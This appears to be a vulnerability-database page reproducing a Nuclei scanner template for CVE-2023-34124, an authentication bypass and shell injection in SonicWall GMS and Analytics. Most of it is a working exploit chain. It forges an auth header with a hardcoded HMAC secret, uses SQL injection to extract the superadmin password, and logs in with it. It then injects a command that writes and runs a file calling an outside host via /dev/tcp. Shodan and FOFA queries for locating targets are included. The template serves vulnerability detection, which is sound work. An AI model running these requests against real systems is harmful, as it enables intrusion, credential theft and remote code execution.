SonicWall GMS and Analytics Web Services - Shell Injection

2023-08-2813:26:29

ProjectDiscovery

github.com

109

sonicwall

gms

analytics

shell

injection

authentication

bypass

cve-2023

unauthorized access

data leakage

compromise

security patch

vulnerability

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.3

Confidence

High

EPSS

0.075

Percentile

94.2%

JSON

The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions

id: CVE-2023-34124

info:
  name: SonicWall GMS and Analytics Web Services - Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34124
    cwe-id: CWE-287,CWE-305
    epss-score: 0.03433
    epss-percentile: 0.91476
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:-1381126564
    fofa-query: icon_hash=-1381126564
  tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive
variables:
  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: json
        part: body
        internal: true
        name: alias
        group: 1
        json:
          - '.alias'

      - type: regex
        part: body
        internal: true
        name: servertoken
        group: 1
        regex:
          - "getPwdHash.*,'([0-9]+)'"
# digest: 4a0a004730450220535bce466bdc32d6868a70227a183d1b6246f93d044a5aecde35e07f4ddb140a022100d8d1f4d3c91b5da971ecd3f6a2c1431fca7c60a3ba9bf7dbcdbacea3a67bdbe0:922c64590222798bb761d5b6d8e72950

References

attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis

github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb

nvd.nist.gov/vuln/detail/CVE-2023-34124

raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb

www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/